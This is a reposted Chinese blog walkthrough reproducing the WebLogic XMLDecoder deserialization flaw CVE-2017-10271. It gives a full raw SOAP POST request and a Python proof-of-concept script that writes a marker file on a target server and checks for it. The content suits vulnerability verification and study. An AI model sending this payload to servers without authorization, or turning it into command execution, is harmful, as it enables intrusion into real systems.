碼上快樂

相關內容    簡體    繁體

Weblogic(CVE-2017-10271)漏洞復現

本文轉載自   查看原文   2018-01-05 16:17   16205    滲透測試

WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)

漏洞編號:CVE-2017-10271

漏洞描述:WebLogic WLS組件中存在CVE-2017-10271遠程代碼執行漏洞,可以構造請求對運行WebLogic中間件的主機進行攻擊,近期發現此漏洞的利用方式為傳播挖礦程序。

受影響WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。

A、環境搭建

  不解釋

B、漏洞利用:

1、初步判斷:訪問 http://192.168.8.148:7001/wls-wsat/CoordinatorPortType11,存在下圖則說明可能存在漏洞

2、構造POST包進行測試,寫入test.txt

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.8.148:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 756

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
         <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter"> 
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
                        <string>xmldecoder_vul_test</string></void><void method="close"/>
                    </object>
            </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
</soapenv:Envelope>

PS:wls-wsat路徑  /root/Oracle/Middleware//user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat/

3、訪問test.txt,漏洞驗證成功

Python驗證腳本:

#!/usr/bin/env python
# coding:utf-8

import requests
from sys import argv

headers = {
	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
	'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Upgrade-Insecure-Requests': '1',
	'Content-Type': 'text/xml'
    }
def Webogic_XMLDecoder_poc(url):
	#url="http://192.168.8.148:7001"
	posturl=url+'/wls-wsat/CoordinatorPortType'
	data = '''
	<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
		<soapenv:Header>
			<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
				<java version="1.6.0" class="java.beans.XMLDecoder">
					<object class="java.io.PrintWriter"> 
						<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
						<string>xmldecoder_vul_test</string></void><void method="close"/>
					</object>
				</java>
			</work:WorkContext>
		</soapenv:Header>
		<soapenv:Body/>
	</soapenv:Envelope>
    '''
	
	print url
	try:
		r=requests.post(posturl,data=data,headers=headers,timeout=5)
		geturl=url+"/wls-wsat/test.txt"
		#print geturl
		check_result = requests.get(geturl,headers=headers,timeout=5)
		if 'xmldecoder_vul_test' in check_result.text:
			print u"存在WebLogic WLS遠程執行漏洞(CVE-2017-10271)"
	except:
		pass

if __name__ == '__main__':
	if len(argv) == 1:
		print "Please input python Webogic_XMLDecoder_poc.py http://xxxx:7001"
		exit(0)
	else:
		url = argv[1]
	Webogic_XMLDecoder_poc(url)

驗證截圖:

 

最后

歡迎關注個人微信公眾號:Bypass--,每周原創一篇技術干貨。 

參考文章:

https://github.com/ysrc/xunfeng/blob/master/vulscan/vuldb/weblogic_CVE_2017_10271.py

http://www.cnblogs.com/sevck/p/8092760.html

 http://blog.csdn.net/qq_27446553/article/details/78952010


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Weblogic 'wls-wsat' XMLDecoder 反序列化_CVE-2017-10271漏洞復現 【復現】Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271) weblogic CVE-2017-10271修復教程 weblogic XMLDecoder反序列化 CVE-2017-10271 工具檢測+工具利用復現 Weblogic wls-wsat組件反序列化漏洞(CVE-2017-10271) (CVE-2017-10271)weblogic12.1.3.0漏洞測試與打補丁過程 CVE-2017-7921 漏洞復現 CVE-2017-11882漏洞復現 CVE-2020-14750 WebLogic權限繞過漏洞復現 Vulfocus 復現weblogic_CVE-2020-2883漏洞
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM